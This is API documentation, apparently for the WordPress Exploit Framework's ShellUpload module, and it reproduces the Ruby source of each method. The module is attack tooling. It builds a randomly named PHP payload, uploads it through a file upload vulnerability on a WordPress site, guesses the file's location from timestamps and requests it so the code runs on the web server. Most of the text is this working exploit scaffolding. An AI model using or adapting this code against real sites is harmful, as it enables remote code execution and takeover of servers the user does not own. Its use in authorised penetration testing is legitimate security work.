Module: Wpxf::WordPress::ShellUpload

Includes:

Wpxf

Defined in:

lib/wpxf/wordpress/shell_upload.rb

Overview

Provides reusable functionality for shell upload modules.

Instance Method Summary

• #before_upload ⇒ Boolean

  Called prior to preparing and uploading the payload.

• #execute_payload(payload_url) ⇒ HttpResponse

  Execute the payload at the specified address.

• #expected_upload_response_code ⇒ Integer

  The response code to expect from a successful upload operation.

• #initialize ⇒ Object

  Initialize a new instance of ShellUpload.

• #payload_body_builder ⇒ BodyBuilder

  The Utility::BodyBuilder used to generate the uploader form.

• #payload_name ⇒ String

  The file name of the payload, including the file extension.

• #payload_name_extension ⇒ String

  The extension type to use when generating the payload name.

• #possible_payload_upload_locations ⇒ Array

  An array of possible locations that the payload could have been uploaded to.

• #run ⇒ Boolean

  Run the module.

• #timestamp_range_adjustment_value ⇒ Integer

  The number of seconds to adjust the upload timestamp range start and end values by.

• #upload_request_params ⇒ Hash

  The query string parameters to use when submitting the upload request.

• #upload_result ⇒ HttpResponse^?

  The Net::HttpResponse of the upload operation.

• #upload_timestamp_range ⇒ Array

  The range of possible timestamps that could have been used when the payload reached the target.

• #uploaded_payload_location ⇒ String

  The URL of the payload after it is uploaded to the target.

• #uploader_url ⇒ String

  The URL of the file used to upload the payload.

• #validate_upload_result ⇒ Boolean

  True if the result of the upload operation is valid.

Instance Method Details

#before_upload ⇒ Boolean

Called prior to preparing and uploading the payload.

Returns:

• (Boolean) —

  true if no errors occurred.

# File 'lib/wpxf/wordpress/shell_upload.rb', line 67

def before_upload
  true
end

#execute_payload(payload_url) ⇒ HttpResponse

Execute the payload at the specified address.

Parameters:

• payload_url (String) —

  the payload URL to access.

Returns:

• (HttpResponse) —

  the HTTP response of the request to the payload URL.

# File 'lib/wpxf/wordpress/shell_upload.rb', line 116

def execute_payload(payload_url)
  res = execute_get_request(url: payload_url, cookie: @session_cookie)
  emit_success "Result: #{res.body}" if res && res.code == 200 && !res.body.strip.empty?
  res
end

#expected_upload_response_code ⇒ Integer

Returns the response code to expect from a successful upload operation.

Returns:

• (Integer) —

  the response code to expect from a successful upload operation.

# File 'lib/wpxf/wordpress/shell_upload.rb', line 72

def expected_upload_response_code
  200
end

#initialize ⇒ Object

Initialize a new instance of Wpxf::WordPress::ShellUpload

# File 'lib/wpxf/wordpress/shell_upload.rb', line 8

def initialize
  super

  @session_cookie = nil
  @upload_result = nil
  @payload_name = nil

  _update_info_without_validation(
    desc: %(
      This module exploits a file upload vulnerability
      which allows users to upload and execute PHP
      scripts in the context of the web server.
    )
  )

  register_advanced_options([
    IntegerOption.new(
      name: 'payload_name_length',
      desc: 'The number of characters to use when generating the payload name',
      required: true,
      default: rand(5..10),
      min: 1,
      max: 256
    )
  ])
end

#payload_body_builder ⇒ BodyBuilder

Returns the Utility::BodyBuilder used to generate the uploader form.

Returns:

• (BodyBuilder) —

  the Utility::BodyBuilder used to generate the uploader form.

# File 'lib/wpxf/wordpress/shell_upload.rb', line 51

def payload_body_builder
  nil
end

#payload_name ⇒ String

Returns the file name of the payload, including the file extension.

Returns:

• (String) —

  the file name of the payload, including the file extension.

# File 'lib/wpxf/wordpress/shell_upload.rb', line 41

def payload_name
  @payload_name
end

#payload_name_extension ⇒ String

Returns the extension type to use when generating the payload name.

Returns:

• (String) —

  the extension type to use when generating the payload name.

# File 'lib/wpxf/wordpress/shell_upload.rb', line 82

def payload_name_extension
  'php'
end

#possible_payload_upload_locations ⇒ Array

Returns an array of possible locations that the payload could have been uploaded to.

Returns:

• (Array) —

  an array of possible locations that the payload could have been uploaded to.

# File 'lib/wpxf/wordpress/shell_upload.rb', line 61

def possible_payload_upload_locations
  nil
end

#run ⇒ Boolean

Run the module.

Returns:

• (Boolean) —

  true if successful.

# File 'lib/wpxf/wordpress/shell_upload.rb', line 88

def run
  return false unless super
  return false unless before_upload

  emit_info 'Preparing payload...'
  @payload_name = "#{Utility::Text.rand_alpha(_payload_name_length)}.#{payload_name_extension}"
  builder = payload_body_builder
  return false unless builder

  emit_info 'Uploading payload...'
  return false unless _upload_payload(builder)

  emit_info 'Executing the payload...'
  _validate_and_prepare_upload_locations.each do |payload_url|
    break if execute_payload(payload_url)&.code != 404
  end

  true
end

#timestamp_range_adjustment_value ⇒ Integer

Returns the number of seconds to adjust the upload timestamp range start and end values by.

Returns:

• (Integer) —

  the number of seconds to adjust the upload timestamp range start and end values by.

# File 'lib/wpxf/wordpress/shell_upload.rb', line 123

def timestamp_range_adjustment_value
  10
end

#upload_request_params ⇒ Hash

Returns the query string parameters to use when submitting the upload request.

Returns:

• (Hash) —

  the query string parameters to use when submitting the upload request.

# File 'lib/wpxf/wordpress/shell_upload.rb', line 77

def upload_request_params
  nil
end

#upload_result ⇒ HttpResponse^?

Returns the Net::HttpResponse of the upload operation.

Returns:

• (HttpResponse, nil) —

  the Net::HttpResponse of the upload operation.

# File 'lib/wpxf/wordpress/shell_upload.rb', line 36

def upload_result
  @upload_result
end

#upload_timestamp_range ⇒ Array

Returns the range of possible timestamps that could have been used when the payload reached the target.

Returns:

• (Array) —

  the range of possible timestamps that could have been used when the payload reached the target.

# File 'lib/wpxf/wordpress/shell_upload.rb', line 128

def upload_timestamp_range
  (@start_timestamp - timestamp_range_adjustment_value)..(@end_timestamp + timestamp_range_adjustment_value)
end

#uploaded_payload_location ⇒ String

Returns the URL of the payload after it is uploaded to the target.

Returns:

• (String) —

  the URL of the payload after it is uploaded to the target.

# File 'lib/wpxf/wordpress/shell_upload.rb', line 56

def uploaded_payload_location
  nil
end

#uploader_url ⇒ String

Returns the URL of the file used to upload the payload.

Returns:

• (String) —

  the URL of the file used to upload the payload.

# File 'lib/wpxf/wordpress/shell_upload.rb', line 46

def uploader_url
  nil
end

#validate_upload_result ⇒ Boolean

Returns true if the result of the upload operation is valid.

Returns:

• (Boolean) —

  true if the result of the upload operation is valid.

# File 'lib/wpxf/wordpress/shell_upload.rb', line 109

def validate_upload_result
  true
end